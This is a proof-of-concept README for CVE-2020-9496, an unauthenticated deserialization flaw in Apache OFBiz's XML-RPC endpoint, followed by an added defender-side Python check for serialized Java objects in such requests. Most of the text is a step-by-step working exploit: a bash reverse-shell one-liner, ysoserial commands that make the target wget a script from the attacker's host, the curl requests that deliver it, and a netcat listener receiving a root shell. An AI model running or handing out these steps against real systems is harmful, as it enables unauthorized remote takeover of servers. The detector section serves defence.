
CVE-2020-9496 PoC: Apache OFBiz Code Problem Vulnerability

Associated vulnerability: Apache OFBiz Code Problem Vulnerability (CVE-2020-9496)
Vulnerability description: XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
PoC description: CVE-2020-9496 manual exploit

Readme:
# CVE-2020-9496 - RCE
Because the two xmlrpc-related requests in webtools (xmlrpc and ping) do not use authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.

This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

# Affected Version: 17.12.01

# Fixed Versions: 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this PoC to work we need to drop a shell script on the target and then execute it; both steps are done through curl requests to the xmlrpc endpoint.

### STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.

```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service

```
$ sudo python3 -m http.server 80
```

### STEP 3: Generate Payload via ysoserial - Change IP

```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```

### STEP 4: Copy The Output of Your Payload - Very Long String

```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```

### STEP 5: Use The Below curl Command To Execute Our Payload - Paste The Payload After `extensions">`

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```

### Curl Command Without Payload For Your Reference

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```

### Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution

```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see, we got a hit on our HTTP server: the file has been downloaded to the /tmp directory as shell.sh. Now, to execute that file, create the payload again. But before you do that, start a netcat listener.

### STEP 6: Start NetCat Listener

```
$ nc -lvnp 1337
listening on [any] 1337 ...
```

### STEP 7: Create Payload To Execute Previously Downloaded Shell Script

```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```

### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### STEP 9: Check NetCat Listener For Reverse Connection

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```
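Added example (not part of the PoC README or the OFBiz project): a defender-side request check that looks for the `<serializable>` XML-RPC extension element used in the curl requests above and flags the request when its base64 content decodes to a Java serialization stream (magic bytes `AC ED 00 05`, which is what the `rO0AB...` prefix encodes). The endpoint path and namespace are the ones the PoC uses; the request bodies are constructed samples, with the blob cut to its first 20 characters.

```python
import base64
import xml.etree.ElementTree as ET

# Namespace of the Apache XML-RPC "extensions" feature used by the PoC request;
# a <serializable> element in it carries a base64-encoded Java object stream.
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
SERIALIZABLE_TAG = "{%s}serializable" % XMLRPC_EXT_NS
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # first bytes of every Java serialization stream
XMLRPC_PATH = "/webtools/control/xmlrpc"  # unauthenticated endpoint named in the advisory


def java_payloads(body: str) -> list:
    """Decode every <serializable> element in an XML-RPC body and return those
    that start with the Java stream magic, i.e. real serialized objects."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    hits = []
    for el in root.iter(SERIALIZABLE_TAG):
        try:
            raw = base64.b64decode((el.text or "").strip(), validate=True)
        except ValueError:  # element text is not base64 at all
            continue
        if raw.startswith(JAVA_STREAM_MAGIC):
            hits.append(raw)
    return hits


def classify(path: str, body: str) -> str:
    """'alert' for a serialized Java object posted to the xmlrpc endpoint,
    'suspicious' for one posted anywhere else, 'ok' otherwise."""
    if not java_payloads(body):
        return "ok"
    return "alert" if path.split("?", 1)[0] == XMLRPC_PATH else "suspicious"


# Constructed sample in the PoC's request shape, with the blob cut to its first
# 20 characters (the stream header only, not a working gadget chain).
ATTACK_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
    '<params><param><value><struct><member><name>test</name><value>'
    f'<serializable xmlns="{XMLRPC_EXT_NS}">rO0ABXNyABdqYXZhLnV0</serializable>'
    '</value></member></struct></value></param></params></methodCall>'
)
# Constructed benign call to the same endpoint carrying only a string parameter.
BENIGN_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>example.echo</methodName>'
    '<params><param><value><string>hello</string></value></param></params></methodCall>'
)
```

Running `classify(XMLRPC_PATH, ATTACK_BODY)` returns "alert" while the benign body returns "ok"; the decoded header of the sample is `b"\xac\xed\x00\x05sr\x00\x17java.ut"`, the start of a Java object stream.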